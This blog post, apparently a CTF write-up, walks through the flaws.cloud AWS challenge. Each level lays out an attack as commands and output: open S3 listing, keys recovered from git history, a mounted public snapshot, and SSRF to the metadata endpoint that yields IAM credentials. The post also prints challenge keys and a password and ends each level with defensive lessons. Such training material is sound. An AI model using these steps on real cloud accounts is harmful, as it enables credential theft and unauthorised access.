Post

Lab - CTF:Flaw1.cloud [Level 1 - Level 6]

[toc]


CTF:Flaw1 [Level 1 - Level 6]


Screen Shot 2021-01-21 at 00.03.38


Level 1 - list S3 from outside

https://flaws.cloud/

This level is *buckets* of fun. See if you can find the first sub-domain
  • The site flaws.cloud is hosted as an S3 bucket.
    • a great way to host a static site
    • When hosting a site as an S3 bucket, the bucket name (flaws.cloud) must match the domain name (flaws.cloud).
    • S3 buckets are a global name space

so could create a bucket named berry.com and berry would never be able host their main site via S3 hosting.

  1. determine the site is hosted as an S3 bucket by running a DNS lookup on the domain

    1
    2
    3
    4
    5
    
     $ dig flaws.cloud
     # ; <<>> DiG 9.10.6 <<>> flaws.cloud
     # ...
     # ;; ANSWER SECTION:
     # flaws.cloud.		5	IN	A	52.218.201.235
    
  2. Visiting 54.231.184.255, it’s https://aws.amazon.com/s3/
    • flaws.cloud is hosted as an S3 bucket.
  3. find region
    • nslookup
    • cyberduck: browse this bucket and it will figure out the region automatically.
    • it’s hosted in the region us-west-2
    1
    2
    3
    
     nslookup 54.231.184.255
     # Non-authoritative answer:
     # 255.184.231.54.in-addr.arpa     name = s3-website-us-west-2.amazonaws.com
    
  4. its permissions are a little loose.
    • bucket named flaws.cloud in us-west-2
      1. go to the link https://flaws.cloud.s3.amazonaws.com/
      2. browse the bucket by aws cli

        1
        2
        3
        4
        5
        6
        7
        8
        
        $ aws s3 ls s3://flaws.cloud/ --no-sign-request --region us-west-2
        # 2017-03-13 23:00:38       2575 hint1.html
        # 2017-03-02 23:05:17       1707 hint2.html
        # 2017-03-02 23:05:11       1101 hint3.html
        # 2020-05-22 14:16:45       3162 index.html
        # 2018-07-10 12:47:16      15979 logo.png
        # 2017-02-26 20:59:28         46 robots.txt
        # 2017-02-26 20:59:30       1051 secret-dd02c7c.html
        
  5. go to the link https://flaws.cloud.s3.amazonaws.com/secret-dd02c7c.html
    • Screen Shot 2021-01-21 at 00.22.58

Lesson learned

set up S3 buckets with permissions

  • shouldn’t allow bucket listings.
    • Directory listing of S3 bucket of Legal Robot (link) and Shopify (link).
    • list the files simply by going to https://flaws.cloud.s3.amazonaws.com/
  • Read and write permissions to S3 bucket for Shopify again (link) and Udemy (link).

everyone


Level 2 - List S3 from AWS inside

https://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud

The next level is fairly similar, with a slight twist. You're going to need your own AWS account for this. You just need the free tier

aws s3 --profile YOUR_ACCOUNT ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ aws s3 ls s3://flevel2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud
# An error occurred (NoSuchBucket) when calling the ListObjectsV2 operation: The specified bucket does not exist

$ aws s3 --profile default ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud
# 2017-02-26 21:02:15      80751 everyone.png
# 2017-03-02 22:47:17       1433 hint1.html
# 2017-02-26 21:04:39       1035 hint2.html
# 2017-02-26 21:02:14       2786 index.html
# 2017-02-26 21:02:14         26 robots.txt
# 2017-02-26 21:02:15       1051 secret-e4443fc.html

$ curl https://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud.s3.amazonaws.com/secret-e4443fc.html
# curl: (60) SSL: no alternative certificate subject name matches target host name 'level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud.s3.amazonaws.com'


# go to https://flaws.cloud.s3.amazonaws.com/secret-dd02c7c.html

Screen Shot 2021-01-21 at 00.40.34

Lesson learned

set up S3 buckets with right permissions

authenticated_users


Level 3 - check the git log

Level 3: https://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud

The next level is fairly similar, with a slight twist. Time to find your first AWS key! I bet you'll find something that will let you list what other buckets are.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
# 1. list the files in this directory, and seen that listing in this bucket is open to "Everyone".
aws s3 ls s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud
#                            PRE .git/
# 2017-02-26 19:14:33     123637 authenticated_users.png
# 2017-02-26 19:14:34       1552 hint1.html
# 2017-02-26 19:14:34       1426 hint2.html
# 2017-02-26 19:14:35       1247 hint3.html
# 2017-02-26 19:14:33       1035 hint4.html
# 2020-05-22 14:21:10       1861 index.html
# 2017-02-26 19:14:33         26 robots.txt


# 2. .git file.


# 3. Download this whole S3 bucket using:
aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ . --no-sign-request --region us-west-2


# 4. see the log history
$ git log
# commit b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526 (HEAD -> master)
# Author: 0xdabbad00 <scott@summitroute.com>
# Date:   Sun Sep 17 09:10:43 2017 -0600
#     Oops, accidentally added something I shouldn't have
# commit f52ec03b227ea6094b04e43f475fb0126edb5a61 (this one)
# Author: 0xdabbad00 <scott@summitroute.com>
# Date:   Sun Sep 17 09:10:07 2017 -0600
#    first commit


# A secret file removed in commit on Sep 17
# checkout the state of the repository before that commit
git checkout f52ec03b227ea6094b04e43f475fb0126edb5a61
# a file show up

[ctf4]
aws_access_key_id = AKIAJ366LIPB4IJKT7SA
aws_secret_access_key = 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


# 5. list S3 buckets using the profile
aws --profile flaws s3 ls
# 2017-02-12 16:31:07 2f4e53154c0a7fd086a04a12a452c2a4caed8da0.flaws.cloud
# 2017-05-29 12:34:53 config-bucket-975426262029
# 2017-02-12 15:03:24 flaws-logs
# 2017-02-04 22:40:07 flaws.cloud
# 2017-02-23 20:54:13 level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud
# 2017-02-26 13:15:44 level3-9afd3927f195e10225021a578e6f78df.flaws.cloud
# 2017-02-26 13:16:06 level4-1156739cfb264ced6de514971a4bef68.flaws.cloud
# 2017-02-26 14:44:51 level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud
# 2017-02-26 14:47:58 level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud
# 2017-02-26 15:06:32 theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud

Lesson learned

  1. key
    • should always revoke any AWS keys (or any secrets) that could have been leaked or were misplaced. Roll your secrets early and often.
  2. list right
    • can’t restrict the ability to list only certain buckets in AWS
    • if give the ability to list some buckets in an account, they will be able to list them all.

Level 4 - protect the volume screenshot

https://level4-1156739cfb264ced6de514971a4bef68.flaws.cloud/

For the next level, you need to get access to the web page running on an EC2 at 4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud. It'll be useful to know that a snapshot was made of that EC2 shortly after nginx was setup on it.
  1. find the account ID
1
2
3
4
5
6
7
8
9
10
# to do some enumeration of the user:
# STS  Security Token Service, handles security controls of various AWS accounts.
# The other one to check would be IAM.
$ aws sts get-caller-identity \
    --profile flaws
# {
#     "UserId": "AIDAJQ3H5DC3LEG2BKSLC",
#     "Account": "975426262029",
#     "Arn": "arn:aws:iam::975426262029:user/backup"
# }
  1. find the snapshot
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
$ aws ec2 describe-snapshots \
    --owner-id 975426262029 \
    --profile flaws
# {
#     "Snapshots": [
#         {
#             "Description": "",
#             "Encrypted": false,
#             "OwnerId": "975426262029",
#             "Progress": "100%",
#             "SnapshotId": "snap-0b49342abd1bdcb89",
#             "StartTime": "2017-02-28T01:35:12+00:00",
#             "State": "completed",
#             "VolumeId": "vol-04f1c039bc13ea950",
#             "VolumeSize": 8,
#             "Tags": [
#                 {
#                     "Key": "Name",
#                     "Value": "flaws backup 2017.02.27"
#                 }
#             ]
#         }
#     ]
# }


# check the permissions on this snapshot
aws ec2 describe-snapshot-attribute \
    --snapshot-id snap-0b49342abd1bdcb89 \
    --attribute createVolumePermission \
    --profile flaws
# {
#     "CreateVolumePermissions": [ { "Group": "all" } ],
#     "SnapshotId": "snap-0b49342abd1bdcb89"
# }
# anyone can create a volume based on this snapshot!
  1. create-volume
1
2
3
4
5
6
7
8
9
# create an EC2 volume for us-west-2 with the snapshot-id of the public EC2 snapshot found earlier.
aws ec2 create-volume \
    --availability-zone us-west-2a \
    --region us-west-2 \
    --snapshot-id snap-0b49342abd1bdcb89 \

# verify that it worked, seeing the volume listed.
aws ec2 describe-volumes \
    --region us-west-2
  1. create ec2
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
# create an EC2 in the us-west-2 region

# 1. in the storage options, choose the volume you just created.

# 2. attach the volume to the instance
aws ec2 attach-volume \
    --volume-id vol-0fb33b360dc095bf9 \
    --instance-id i-0b2f1bdcbfda7602b \
    --device /dev/sdf \
    --region us-west-2


# see the instance using
aws ec2 describe-instances \
    --region us-west-2


# SSH in:
ssh -i YOUR_KEY.pem ec2-user@ec2-54-191-240-80.us-west-2.compute.amazonaws.com
  1. mount it.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
# list available drives:
lsblk
# Returns:
#  NAME    MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
#  xvda        202:0    0   8G  0 disk
#  --xvda1     202:1    0   8G  0 part /
#  xvdb        202:16   0   8G  0 disk
#  --xvdb1     202:17   0   8G  0 part

sudo file -s /dev/xvdb1
# Returns:
#  /dev/xvdb1: Linux rev 1.0 ext4 filesystem data, UUID=5a2075d0-d095-4511-bef9-802fd8a7610e, volume name "cloudimg-rootfs" (extents) (large files) (huge files)

# Next we mount it
sudo mkdir /mnt/flaws/
sudo mount /dev/xvdf1 /mnt/flaws

# show the mount
mount

  1. browse to /mnt/flaws
    • Ubuntu is the only user for the volume.
    • in the home file, a bash script for setting up the server.
    • Included in that file is a hardcoded password
    • take the credentials flaws:nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M (username:password)
    • and try them on the web portal that we were asked to authenticate too earlier.
1
2
3
4
5
6
7
# Running some variant of `find /mnt -mtime -1` will help to find recent files, which you can filter further using:

$ find /mnt -type f -mtime -1 2>/dev/null | grep -v "/var/" | grep -v "/proc/" | grep -v "/dev/" | grep -v "/sys/" | grep -v "/run/" | less


$ cat /home/ubuntu/setupNginx.sh
# htpasswd -b /etc/nginx/.htpasswd flaws nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M

Screen Shot 2021-01-24 at 21.52.23


Lesson learned

AWS allows snapshots of EC2’s and databases (RDS).

  • The main purpose for that is to make backups
  • but people sometimes use snapshots to get access back to their own EC2’s when they forget the passwords.
  • This also allows attackers to get access to things.
  • Snapshots are normally restricted to your own account, so a possible attack would be
    • an attacker getting access to an AWS key that allows them to start/stop and do other things with EC2’s
    • and then uses that to snapshot an EC2
    • and spin up an EC2 with that volume in your environment to get access to it.

Level 5 - gain metadata from magic ip 169.254.169.254

https://level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud/243f422c/

This EC2 has a simple HTTP only proxy on it. Here are some examples of it's usage: - https://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/flaws.cloud/ - https://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/summitroute.com/blog/feed.xml - https://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/neverssl.com/ See if you can use this proxy to figure out how to list the contents of the level6 bucket at level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud that has a hidden directory in it.
  1. find the credential
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
aws s3 ls s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud \
    --profile flaws
# An error occurred (AccessDenied) when calling the ListObjectsV2 operation: Access Denied


# the structure to use the proxy is:
URL/proxy/2ndURL


# In the given URLs this looks like it just redirects us.
# In cloud environments like AWS, GCP, Azure etc, there is an IP that instances can view for metadata.
# This is known as the magic address 169.254.169.254.
# This is the same across all major providers and has been the target for very prolific attacks such as CapitalOne breach.
# We can’t reach the magic address from where we are normally, only things within the cloud environment can see it.
# However, since the EC2 instance is proxying our traffic, we can get that to hit the magic address for us.

# to view metadata:
https://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/
# 1.0
# 2007-01-19
...
# 2019-10-01
# 2020-10-27
# latest


https://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws
# {
#   "Code" : "Success",
#   "LastUpdated" : "2021-01-25T02:43:46Z",
#   "Type" : "AWS-HMAC",
#   "AccessKeyId" : "ASIA6GG7PSQG3Z37DUWV",
#   "SecretAccessKey" : "jGW0vsJZV4UxMbkAZXW/7+cEyjRd1UPmNt0Jdokq",
#   "Token" : "IQoJb3JpZ2luX2VjE...HVF05TUZ6AQ==",
#   "Expiration" : "2021-01-25T08:49:02Z"
# }

  1. manually put this in our profile configuration file.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
vim ~/.aws/credentials
# [flaws2]
# aws_access_key_id = ASIA6GG7PSQG3Z37DUWV
# aws_secret_access_key = jGW0vsJZV4UxMbkAZXW/7+cEyjRd1UPmNt0Jdokq
# aws_session_token = IQoJb3JpZ2luX2VjECMaCXV...45PGHVF05TUZ6AQ==


aws sts get-caller-identity \
    --profile flaws2
# {
#     "UserId": "AROAI3DXO3QJ4JAWIIQ5S:i-05bef8a081f307783",
#     "Account": "975426262029",
#     "Arn": "arn:aws:sts::975426262029:assumed-role/flaws/i-05bef8a081f307783"
# }
  1. list the bucket
1
2
3
4
5
6
7
8
9
10
11
aws s3 ls s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud \
    --profile flaws2
#                            PRE ddcc78ff/
# 2017-02-26 21:11:07        871 index.html

aws s3 ls s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ddcc78ff/ \
    --profile flaws2
# 2017-03-02 23:36:23       2463 hint1.html
# 2017-03-02 23:36:23       2080 hint2.html
# 2020-05-22 14:42:20       2924 index.html

Lesson learned

169.254.169.254, magic IP in the cloud world.

  • AWS, Azure, Google, DigitalOcean and others use this to allow cloud resources to find out metadata about themselves.
  • Some, such as Google, have additional constraints on the requests, such as requiring it to use Metadata-Flavor: Google as an HTTP header and refusing requests with an X-Forwarded-For header.
  • AWS has recently created a new IMDSv2 that requires special headers, a challenge and response, and other protections, but many AWS accounts may not have enforced it. If you can make any sort of HTTP request from an EC2 to that IP, you’ll likely get back information the owner would prefer you not see.
  • A similar problem to getting access to the IAM profile’s access keys is access to the EC2’s user-data, which people sometimes use to pass secrets to the EC2 such as API keys or credentials.

Avoiding this mistake

  • Ensure your applications do not allow access to 169.254.169.254 or any local and private IP ranges.
  • ensure that IAM roles are restricted as much as possible.

Level 6 - enumerate the policy

https://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ddcc78ff/

For this final challenge, you're getting a user access key that has the SecurityAudit policy attached to it. See what else it can do and what else you might find in this AWS account. Access key ID: AKIAJFQ6E7BY57Q3OBGA Secret: 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
  1. find out who you are
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# looking at IAM policies, get the user name
aws iam get-user --profile flaws6
# {
#     "User": {
#         "Path": "/",
#         "UserName": "Level6",
#         "UserId": "AIDAIRMDOSCWGLCDWOG6A",
#         "Arn": "arn:aws:iam::975426262029:user/Level6",
#         "CreateDate": "2017-02-26T23:11:16+00:00"
#     }
# }



# what policies are attached to this UserName
aws iam list-attached-user-policies \
    --user-name Level6 \
    --profile flaws6
# {
#     "AttachedPolicies": [
#         {
#             "PolicyName": "list_apigateways",
#             "PolicyArn": "arn:aws:iam::975426262029:policy/list_apigateways"
#         },
#         {
#             "PolicyName": "MySecurityAudit",
#             "PolicyArn": "arn:aws:iam::975426262029:policy/MySecurityAudit"
#         }
#     ]
# }
  1. check the list_apigateways policy
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
# know the PolicyArn, get it's version id:
aws iam get-policy  \
    --policy-arn arn:aws:iam::975426262029:policy/list_apigateways \
    --profile flaws6
# {
#     "Policy": {
#         "PolicyName": "list_apigateways",
#         "PolicyId": "ANPAIRLWTQMGKCSPGTAIO",
#         "Arn": "arn:aws:iam::975426262029:policy/list_apigateways",
#         "Path": "/",
#         "DefaultVersionId": "v4",
#         "AttachmentCount": 1,
#         "PermissionsBoundaryUsageCount": 0,
#         "IsAttachable": true,
#         "Description": "List apigateways",
#         "CreateDate": "2017-02-20T01:45:17+00:00",
#         "UpdateDate": "2017-02-20T01:48:17+00:00"
#     }
# }


# Now that you have the ARN and the version id, you can see what the actual policy is:
aws iam get-policy-version  \
    --policy-arn arn:aws:iam::975426262029:policy/list_apigateways \
    --version-id v4 \
    --profile flaws6
# {
#     "PolicyVersion": {
#         "Document": {
#             "Version": "2012-10-17",
#             "Statement": [
#                 {
#                     "Action": [ "apigateway:GET" ],
#                     "Effect": "Allow",
#                     "Resource": "arn:aws:apigateway:us-west-2::/restapis/*"
#                 }
#             ]
#         },
#         "VersionId": "v4",
#         "IsDefaultVersion": true,
#         "CreateDate": "2017-02-20T01:48:17+00:00"
#     }
# }


# The API gateway in this case is used to call a lambda function
  1. check the MySecurityAudit policy
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
aws iam get-policy  \
    --policy-arn arn:aws:iam::975426262029:policy/MySecurityAudit \
    --profile flaws6
# "DefaultVersionId": "v1",


aws iam get-policy-version \
    --policy-arn arn:aws:iam::975426262029:policy/MySecurityAudit \
    --version-id v1 \
    --profile flaws6
# {
#     "PolicyVersion": {
#         "Document": {
#             "Version": "2012-10-17",
#             "Statement": [
#                 {
#                     "Action": [
#                         "acm:Describe*",
#                         "acm:List*",
#                         "application-autoscaling:Describe*",
#                         "athena:List*",
#                         "autoscaling:Describe*",
#                         "lambda:GetAccountSettings",
#                         "lambda:GetPolicy",
#                         "lambda:List*",
#                         ...
#                     ] } ] } } }


# The SecurityAudit policy lets you see some things about lambdas:
aws lambda list-functions \
    --region us-west-2 \
    --profile flaws6
# {
#     "Functions": [
#         {
#             "FunctionName": "Level6",
#             "FunctionArn": "arn:aws:lambda:us-west-2:975426262029:function:Level6",
#             "Runtime": "python2.7",
#             "Role": "arn:aws:iam::975426262029:role/service-role/Level6",
#             "Handler": "lambda_function.lambda_handler",
#             "CodeSize": 282,
#             "Description": "A starter AWS Lambda function.",
#             "Timeout": 3,
#             "MemorySize": 128,
#             "LastModified": "2017-02-27T00:24:36.054+0000",
#             "CodeSha256": "2iEjBytFbH91PXEMO5R/B9DqOgZ7OG/lqoBNZh5JyFw=",
#             "Version": "$LATEST",
#             "TracingConfig": { "Mode": "PassThrough" },
#             "RevisionId": "98033dfd-defa-41a8-b820-1f20add9c77b",
#             "PackageType": "Zip"
#         }
#     ]
# }


# the SecurityAudit also lets you run:
aws lambda get-policy \
    --region us-west-2 \
    --profile flaws6 \
    --function-name Level6
# {
#     "Policy": "{\"Version\":\"2012-10-17\",\"Id\":\"default\",\"Statement\":[{\"Sid\":\"904610a93f593b76ad66ed6ed82c0a8b\",\"Effect\":\"Allow\",\"Principal\":{\"Service\":\"apigateway.amazonaws.com\"},\"Action\":\"lambda:InvokeFunction\",\"Resource\":\"arn:aws:lambda:us-west-2:975426262029:function:Level6\",\"Condition\":{\"ArnLike\":{\"AWS:SourceArn\":\"arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6\"}}}]}",
#     "RevisionId": "98033dfd-defa-41a8-b820-1f20add9c77b"
# }


# the ability to execute `arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6\` That "s33ppypa75" is a rest-api-id, which you can then use with that other attached policy:
aws apigateway get-stages \
    --rest-api-id "s33ppypa75" \
    --region us-west-2 \
    --profile flaws6 \
# {
#     "item": [
#         {
#             "deploymentId": "8gppiv",
#             "stageName": "Prod",
#             "cacheClusterEnabled": false,
#             "cacheClusterStatus": "NOT_AVAILABLE",
#             "methodSettings": {},
#             "tracingEnabled": false,
#             "createdDate": "2017-02-26T19:26:08-05:00",
#             "lastUpdatedDate": "2017-02-26T19:26:08-05:00"
#         }
#     ]
# }

# the stage name is "Prod". Lambda functions are called using that rest-api-id, stage name, region, and resource as https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6


# Visit that URL.
"Go to https://theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud/d730aa2b/"

Lesson learned

It is common to give people and entities read-only permissions such as the SecurityAudit policy.

  • The ability to read your own and other’s IAM policies can really help an attacker figure out what exists in your environment and look for weaknesses and mistakes. A voiding this mistake
  • Don’t hand out any permissions liberally, even permissions that only let you read meta-data or know what your permissions are.

This post is licensed under CC BY 4.0 by the author.

Comments powered by Disqus.